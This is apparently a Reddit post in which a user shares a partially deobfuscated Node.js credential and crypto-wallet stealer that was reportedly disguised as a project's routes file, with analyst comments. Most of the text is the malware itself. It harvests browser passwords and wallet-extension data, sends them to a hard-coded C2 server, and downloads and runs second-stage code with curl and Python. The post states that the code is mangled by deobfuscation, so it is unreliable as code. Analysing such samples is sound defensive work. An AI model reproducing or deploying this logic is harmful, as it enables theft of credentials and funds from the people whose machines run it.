From: https://www.reddit.com/r/hacking/comments/18npzcl/obfuscated_code_a_recruiter_sent_me/

Deobfuscated credential / Solana-wallet stealer (Node.js). Note: the deobfuscation is partial — template-literal backticks, several index brackets and comparison operators were lost — so the listing below is not valid JavaScript; it is kept as an analysis artefact, not as runnable code.

Found: https://github.com/SolmateD/Solmate-presale-backend/blob/9161e3ca130d1d958fd26c33191161db524c0039/src/services/routes.js#L1

The GitHub account is no longer active.

// Obfuscator residue: bare property references with no runtime effect,
// presumably left over from the packer's indirect method-name lookups.
Object.prototype.hasOwnProperty
Object.prototype.toString
Object.defineProperty
Object.getOwnPropertyDescriptor
// --- String-table decoders, module aliases and C2 configuration ---
// NOTE(review): this listing is a partial deobfuscation. Index brackets were
// dropped in several places (`eo` = e[o](F), `co` = c[o](t), `Srt` = S[rt](F),
// `Set` = S[et](r), `Sxt` = S[xt](r), `e$` = e[$](...)) and template-literal
// backticks are gone everywhere; read the code with that in mind.
const t = 'base64',
c = 'utf8',
// r(s): drop the first character, base64-decode the rest, return UTF-8.
r = (r) => ((s1 = r.slice(1)), Buffer.from(s1, t).toString(c)),
// e(data, key): base64-decode `data`, XOR each byte with key.charCodeAt(i & 3)
// (a repeating 4-character key), return as UTF-8. `eo` is the garbled e[o](F).
e = (r, e) => {
let E = Buffer.from(r, t)
const s = E.length
let F = 0,
a = new Uint8Array(s)
for (ii = 0; ii < s; ii++) {
F = 3 & ii
let t = eo
a[ii] = 255 & (E[ii] ^ t)
}
return ((t, c) => Buffer.from(t).toString(c))(a, c)
},
// Convenience decoder; passes c ('utf8') as the key argument.
E = (t) => e(t, c),
// Method names the packer looked up indirectly (obj[o] === obj.charCodeAt, ...).
o = 'charCodeAt',
$ = 'platform',
n = 'tmpdir',
l = 'homedir',
R = 'hostname',
W = 'type',
// sqlite3 and request are third-party packages: a repository carrying this
// file must declare them in package.json — a quick triage indicator.
V = require('os'),
U = require('path'),
g = require('sqlite3'),
h = require('crypto'),
Q = require('request'),
w = require('child_process').exec,
// The deobfuscator resolved some aliases back to module names (os, path, fs,
// request, sqlite3) but kept the single-letter bindings above; both forms appear.
x = os.hostname(),
f = os.platform(),
y = os.homedir(),
I = os.tmpdir(),
G = os.type(),
S = require('fs')
// Run timestamp: set to Date.now() in Dt() and sent as `ts` by Ut().
let u
const d = (t) => e(t, c),
// C2 / exfiltration server. IOC: 147.124.212.89, TCP 1244, plain HTTP.
// Endpoints used below: /uploads, /keys, /pdown, /node/<ver>, /client/<tag>.
X = 'http://147.124.212.89:1244',
H = 'dirname',
// C(path): expand a leading '~/' to the home directory. The regex lost an
// escape in deobfuscation (`|/)` was presumably `|\/)`), and `os.homedir` is
// passed unevaluated on the other branch.
C = (t) =>
t.replace(/^~([a-z]+|/)/, (t, c) =>
'/' === c ? y : path.dirname(os.homedir)
),
// Base64 of "Tea0m4"; sent as `type` with every upload and used as the
// /client/<tag> path — presumably a campaign or build identifier.
Y = 'VGVhMG00',
D = 'writeFileSync',
k = 'EhES',
b = '/client',
// Drop path of the second-stage Python script (<home>/.npl), see Ct().
M = '/.npl',
N = '/client',
p = 'writeFileSync',
Z = 'get',
m = 'existsSync',
// Native addon dropped to <home>/store.node by Ht(); P() takes CryptUnprotectData from it.
j = '/store.node',
J = 'accessSync'

// T(path): true when the path exists (fs.accessSync succeeds), false otherwise.
// Existence probe for profile directories and extension stores. `fs` is the
// deobfuscator's resolution of the S binding above.
function T(t) {
try {
return fs.accessSync(t), true
} catch (t) {
return false
}
}
// --- Chromium saved-password harvester (Chrome, Brave, Opera, Edge) ---
// P(t, c): t is the browser's index, used only to label the upload; c is the
// browser's "User Data" directory relative to the home directory.
// Windows only: returns early unless os.type() is 'Windows_NT', because the
// master key is unwrapped with CryptUnprotectData from the native store.node addon.
const v = 'Default',
O = 'Profile',
// Edge "User Data" root; the trailing quote is a deobfuscation artefact.
K = "/AppData/Local/Microsoft/Edge/User Data'",
P = (t, c) => {
result = ''
try {
// Backticks lost: `${t}` and `${y}${j}` (= <home>/store.node) below.
const r = ${t},
// Native addon fetched by Ht(); e[$] resolves to its CryptUnprotectData export.
e = require(${y}${j})
if (G != 'Windows_NT') {
return
}
// s = <home>/<User Data path>
const s = ${C('~/')}${c}
// Reassigns the module-level single-letter names to the strings this routine
// needs (column names, method names, output labels). Note u becomes 'P: ' here.
i = 'username_value'
A = 'password_value'
$ = 'CryptUnprotectData'
n = 'createDecipheriv'
l = 'readFile'
R = 'copyFile'
W = 'Login Data'
V = 'os_crypt'
Q = 'encrypted_key'
w = 'Database'
x = 'latin1'
f = 'U: '
I = 'W: '
u = 'P: '
X = 'unlink'
// The path literal here is garbled. The JSON it parses (os_crypt.encrypted_key)
// matches the layout of Chromium's "Local State" file, so that is presumably
// what is read — confirm against the original sample.
fs.readFile('child_process', 'utf-8', (t, c) => {
if (!t) {
mkey = JSON.parse(c)
mkey = mkey.os_crypt.encrypted_key
// base64 -> raw bytes (`co` is the garbled c[o](t) = c.charCodeAt(t)).
mkey = ((t) => {
var c = atob(t),
r = new Uint8Array(c.length)
for (let t = 0; t < c.length; t++) {
r[t] = co
}
return r
})(mkey)
try {
// `e$` = e[$](mkey): unwrap the AES master key with CryptUnprotectData (DPAPI).
const t = e$
// Profiles: 'Default', then 'Profile 1' .. 'Profile 200'
// (`0 = ii` is the garbled `0 === ii`).
for (ii = 0; ii <= 200; ii++) {
const c = 0 = ii ? v : ${O} ${ii},
// e = <User Data>/<profile>/Login Data (SQLite); o = scratch copy <User Data>/t<profile>.
e = ${s}/${c}/${W},
o = ${s}/t${c}
if (!T(e)) {
continue
}
// Upload label: <browserIndex>_<profileIndex>_Profile
const F = ${r}_${ii}_${O}
// Copies the database first — presumably to sidestep the lock a running browser holds.
fs.copyFile(e, o, (c) => {
try {
const c = new sqlite3.Database(o)
c.all('SELECT * FROM logins', (r, e) => {
var E = ''
r ||
e.forEach((c) => {
var r = c.origin_url,
e = c.username_value,
o = c.password_value
try {
// Garbled `'v' === o.subarray(0, 1).toString()`: only blobs whose 3-byte
// version prefix starts with 'v' are handled. Nonce = bytes [3,15),
// ciphertext = [15, len-16); the trailing 16 bytes (presumably the GCM
// tag) are never verified — update() only, no setAuthTag()/final().
'v'
= o.subarray(0, 1).toString() &&
((iv = o.subarray(3, 15)),
(cip = o.subarray(15, o.length - 16)),
cip.length &&
// h[n] = crypto.createDecipheriv('aes-256-gcm', masterKey, iv)
((mmm = h[n]("aes-256-gcm'", t, iv).update(cip)),
// Appends one "W: <url> U: <user> P: <password>" record per row.
(E = ${E}${I}${r} ${f} ${e} ${u}${mmm.toString( x )}\n\n)))
} catch (t) {}
})
c.close()
// Delete the scratch copy, then exfiltrate the collected rows via Ut().
fs.unlink(o, (t) => {})
Ut(F, E)
})
} catch (t) {}
})
}
} catch (t) {}
}
})
} catch (t) {}
},
// --- Strings and target paths for the wallet-extension collector (lt) ---
q = 'filename',
z = 'multi_file',
L = 'form_data',
_ = 'url',
tt = 'options',
ct = 'value',
rt = 'readdirSync',
et = 'statSync',
// Et is a comma expression: 'isDirectory' and 'post' are evaluated and
// discarded, the parenthesised assignments run as side effects, and Et ends up
// as the last operand. Ut() uses `request[Et]`, which in the original is
// clearly request.post; treat Et's exact binding as lost in deobfuscation.
Et =
('isDirectory',
'post',
// Browser profile roots relative to the home directory, one triple per
// browser: [macOS, Linux, Windows]. Dt() picks the column from os.platform().
(ot = [
[
'/Library/Application Support/Google/Chrome',
'/.config/google-chrome',
'/AppData/Local/Google/Chrome/User Data',
],
[
'/Library/Application Support/BraveSoftware/Brave-Browser',
'/.config/BraveSoftware/Brave-Browser',
'/AppData/Local/BraveSoftware/Brave-Browser/User Data',
],
[
'/Library/Application Support/com.operasoftware.Opera',
'/.config/opera',
'/AppData/Roaming/Opera Software/Opera Stable/User Data',
],
]),
// Per-profile directory holding each extension's LevelDB storage.
(st = 'Local Extension Settings'),
// LevelDB file types collected from those stores.
(Ft = '.log'),
(at = '.ldb'),
// Upload name for the Solana CLI keypair (~/.config/solana/id.json).
(Bt = 'solana_id.txt'))
// Host identifier sent as `hid` by Ut(); Dt() overwrites it with os.hostname().
let it = 'comp'
// Chrome-extension IDs whose 'Local Extension Settings' LevelDB stores lt()
// collects. They read as browser wallet extensions (the first ID is the one
// commonly attributed to MetaMask, 'bfnaelmomeimhlpmgjnjophhpkkoljpa' to
// Phantom) — confirm each against the Chrome Web Store before using them as
// indicators. 'fhbohimaelbohpjbbldcngcnapndodjp' is listed twice.
const At = [
'nkbihfbeogaeaoehlefnkodbefgpgknn',
'ejbalbakoplchlghecdalmeeeajnimhm',
'bfnaelmomeimhlpmgjnjophhpkkoljpa',
'ibnejdfjmmkpcnlpebklmnkoeoihofec',
'fhbohimaelbohpjbbldcngcnapndodjp',
'fhbohimaelbohpjbbldcngcnapndodjp',
'aeachknmefphepccionboohckonoeemg',
'hifafgmccdpekplomjjkcfgodnhcellj',
],
$t = 'createReadStream',
// C2 endpoint receiving the multipart file upload.
nt = '/uploads',
// lt(root, labelPrefix, grabSolana): collect wallet-extension LevelDB files
// (and optionally the Solana CLI keypair) under a browser profile root and POST
// them to <C2>/uploads. Returns the array of multipart parts it built.
lt = async (t, c, r) => {
let e = t
// Empty root (platform not covered by the ot table) -> nothing to do.
if (!e || '' === e) {
return []
}
try {
if (!T(e)) {
return []
}
} catch (t) {
return []
}
c || (c = '')
let E = []
// Same profile enumeration as P(): 'Default', then 'Profile 1' .. 'Profile 199'.
for (let r = 0; r < 200; r++) {
const o = ${t}/${0 === r ? v : ${O} ${r}}/${st}
for (let t = 0; t < At.length; t++) {
const s = At[t]
// F = <root>/<profile>/Local Extension Settings/<extensionId>
let F = ${o}/${s}
if (T(F)) {
try {
// `Srt` is the garbled S[rt](F) = fs.readdirSync(F).
far = Srt
} catch (t) {
far = []
}
far.forEach(async (t) => {
// Garbled: in the original this is the joined path <F>/<fileName>.
e = "child_process\base64'"
try {
;
// Only LevelDB .log / .ldb files are taken (an extension's persisted
// storage lives there). Part name: <prefix><profile>_<extId>_<file>.
(e.includes('.log') || e.includes('.ldb')) &&
E.push({
value: fs.createReadStream(e),
options: {
filename: ${c}${r}_${s}_${t}
},
})
} catch (t) {}
})
}
}
}
// Solana CLI default keypair file (~/.config/solana/id.json), uploaded as
// 'solana_id.txt'. `fs.exitSync` is the garbled existsSync.
if (r && ((e = ${y}${'/.config/solana/id.json'}), fs.exitSync(e))) {
try {
E.push({
value: fs.createReadStream(e),
options: {
filename: 'solana_id.txt'
},
})
} catch (t) {}
}
// Multipart form: type = campaign tag, hid = literal 'comp' here (not the
// hostname `it` that Ut() sends), multifile = collected streams.
const o = {
type: Y,
hid: 'comp',
multifile: E,
}
try {
const t = {
[_]: 'http://147.124.212.89:1244/uploads',
[L]: o,
}
// Fire-and-forget POST; the response callback is empty.
request.post(t, (t, c, r) => {})
} catch (t) {}
return E
},
// Rt(): run the password harvester over every browser's Windows profile root
// (column 2 of ot: Chrome, Brave, Opera) plus Edge as index 3.
Rt = () => {
try {
ot.forEach((t, c) => {
P(c, t[2])
})
P(3, K)
} catch (t) {}
},
// C2 endpoint receiving harvested credentials.
Wt = '/keys',
Vt = 'python',
// Ut(label, text): POST the credential dump to <C2>/keys as a form:
// ts = u (Date.now() from Dt — though P() reassigns u to 'P: ' before calling
// Ut, so that is what is actually sent from that path), type = campaign tag,
// hid = hostname, ss = "<browser>_<profile>_Profile" label, cc = the W:/U:/P: lines.
Ut = async (t, c) => {
const r = {
ts: u.toString(),
type: Y,
hid: it,
ss: t,
cc: c.toString(),
},
e = {
[_]: 'http://147.124.212.89:1244/keys',
[L]: r,
}
try {
// request[Et] is meant to be request.post (Et's binding is garbled above).
request[Et](e, (t, c, r) => {})
} catch (t) {}
},
// --- Stage-2 dropper: fetch a Python bundle, then the Python client ---
gt = 'p.zi',
// C2 endpoint serving the zip (a Python runtime, judging by the .pyp\python.exe path).
ht = '/pdown',
Qt = 'renameSync',
wt = 'rename',
xt = 'rmSync',
ft = "tar -xf'",
yt = 'curl -Lo',
// Expected location of the dropped interpreter: <home>\.pyp\python.exe
It = "\.pyp\python.exe",
// Expected byte size of the downloaded zip (~49 MiB); dt() treats the file as
// complete once it reaches this size.
Gt = 51476596
// Bytes of the zip seen so far (0 = not started / restart).
let St = 0
// ut(archive): extract into the home directory via `tar -xf <archive> -C <home>`
// (shell command built by string interpolation), delete the archive, then run
// Ct() to launch the Python client. On tar failure: log, delete, reset St.
const ut = async (t) => {
w(tar -xf' ${t} -C ${y}, (c, r, e) => {
if (c) {
return console.error(err unfile: ${c}), fs.rmSync(t), void(St = 0)
}
fs.rmSync(t)
Ct()
})
},
// dt(): resumable download of <tmp>\pi.zip from <C2>/pdown.
// - St >= Gt: already done, nothing to do.
// - pi.zip exists: stat it (`Set` = S[et](r) = fs.statSync). Complete -> rename
//   to p2.zip and extract; still growing -> remember the size and retry in 20 s;
//   stalled -> delete (`Sxt` = S[xt](r) = fs.rmSync), reset and retry in 20 s.
// - Otherwise `curl -Lo <tmp>\pi.zip <C2>/pdown`; on error retry in 20 s via Xt(),
//   on success mark complete, rename and extract.
// The stray `}` after the p2.zip declaration is a deobfuscation artefact.
dt = () => {
const r = os.tmpdir() + '\\pi.zip',
e = os.tmpdir() + '\\p2.zip'}
if (!(St >= Gt)) {
if (fs.existsSync(r)) {
try {
var E = Set
E.size >= Gt ?
((St = E.size),
S[wt](r, e, (t) => {
if (t) {
throw t
}
ut(e)
})) :
(St < E.size ? (St = E.size) : (Sxt, (St = 0)), Xt())
} catch (t) {}
} else {
w(
curl -Lo' "${r}" + 'http://147.124.212.89:1244/pdown',
(t, c, E) => {
if (t) {
return (St = 0), void Xt()
}
try {
St = Gt
fs.renameSync(r, e)
ut(e)
} catch (t) {}
}
)
}
}
}

// Xt(): re-enter the download state machine (dt) after 20 seconds.
function Xt() {
setTimeout(() => {
dt()
}, 20000)
}
// Ht(): ensure the native addon <home>/store.node is present, then run the
// password harvester (Rt). The addon is fetched per Node version from
// <C2>/node/<major.minor> (taken from process.version, e.g. '18.17'),
// presumably because a .node binary must match the running Node ABI.
// Rt() runs in the curl callback whether or not curl succeeded.
const Ht = async () => {
var t = process.version.match(/^v(\d+.\d+)/)[1]
const c = http://147.124.212.89:1244/node/'+ ${t},
r = os.homedir() + '/store.node'
if (fs.existsSync(r)) {
Rt()
} else {
w('curl -Lo' "${r}" "${c}", (t, c, r) => {
Rt()
})
}
},
// Ct(): drop and launch the Python second stage. The wrapping Promise never
// settles (its resolve/reject are unused), so the `await` in Dt's caller never returns.
// Windows (`'w' f[0]` is the garbled `'w' == f[0]`, i.e. platform 'win32'):
//   - <home>\.pyp\python.exe present: delete <home>/.npl, GET <C2>/client/VGVhMG00
//     into it, run `"<python.exe>" "<home>/.npl"`, then Ht() for the password
//     stage (Ht() also runs if the download or write fails);
//   - otherwise Ht() now and dt() to fetch the Python bundle; dt -> ut -> Ct
//     loops back here once python.exe is in place.
// Other platforms: GET <C2>/client/VGVhMG00 into <home>/.npl and run `python3 "<home>/.npl"`.
Ct = async () =>
await new Promise((t, c) => {
if ('w' f[0]) {
const t = os.homedir() + '\\.pyp\\python.exe'
fs.existsSync(${t}) ?
(() => {
const c = os.homedir() + '/.npl',
// Command line "<home>\.pyp\python.exe" "<home>/.npl" (backticks lost).
r = os.homedir() + '\\.pyp\\python.exe' "${c}"
try {
fs.rmSync(c)
} catch (t) {}
request.get(
'http://147.124.212.89:1244/client/VGVhMG00',
(t, e, E) => {
if (t) {
Ht()
} else {
try {
fs.writeFileSync(c, E)
w(r, (t, c, r) => {
Ht()
})
} catch (t) {
Ht()
}
}
}
)
})() :
(Ht(), dt())
} else {
;
(() => {
const t = '/client',
c = 'writeFileSync',
r = 'get',
e = http://147.124.212.89:1244/client/VGVhMG00,
E = os.homedir() + '/.npl'
let o = python3 "${E}"
request.get(e, (t, r, e) => {
t || (fs.writeFileSync(E, e), w(o, (t, c, r) => {}))
})
})()
}
})
// --- Entry point and scheduler ---
// Yt counts timer ticks: the stealer runs once on load and up to four more
// times at 10-minute intervals.
var Yt = 0
// Dt(): one full collection run.
//   1. u = Date.now() (sent as `ts`), it = hostname (sent as `hid` by Ut).
//   2. For each browser in ot, pick the profile root by platform initial
//      ('d' = darwin -> [0], 'l' = linux -> [1], else Windows -> [2]; the
//      comparison operators are lost) and call lt(root, "<index>_", ...). The
//      third argument is garbled (`0 r`), presumably `0 === r`, so only the
//      first browser entry also triggers the Solana keypair grab. On Windows,
//      Edge is collected as label "3_".
//   3. Ct(): drop and launch the Python stage (which in turn triggers Ht/Rt).
// The async forEach callbacks are not awaited, so the lt() calls overlap and
// Ct() starts before the uploads finish.
const Dt = async () => {
try {
u = Date.now()
await (async () => {
it = x
try {
const t = C('~/')
ot.forEach(async (c, r) => {
let e = ''
e =
'd'
f[0] ?
${t}${c[0]} :
'l' f[0] ?
${t}${c[1]} :
${t}${c[2]}
await lt(e, ${r}_, 0
r)
})
'w' == f[0] && ((pa = ${t}${K}), await lt(pa, '3_', false))
} catch (t) {}
})()
Ct()
} catch (t) {}
}
// Runs immediately when the module is loaded ...
Dt()
// ... then every 600000 ms (10 min): ticks 1-4 re-run Dt(), the 5th clears the timer.
let kt = setInterval(() => {
;
(Yt += 1) < 5 ? Dt() : clearInterval(kt)
}, 600000)
// Exported as the module's value, but the top-level Dt() call above means merely
// requiring this file (the "presale backend" routes module) runs the stealer.
module.exports = Dt

Pub: 21 Dec 2023 18:32 UTC
Update: 21 Dec 2023 18:32 UTC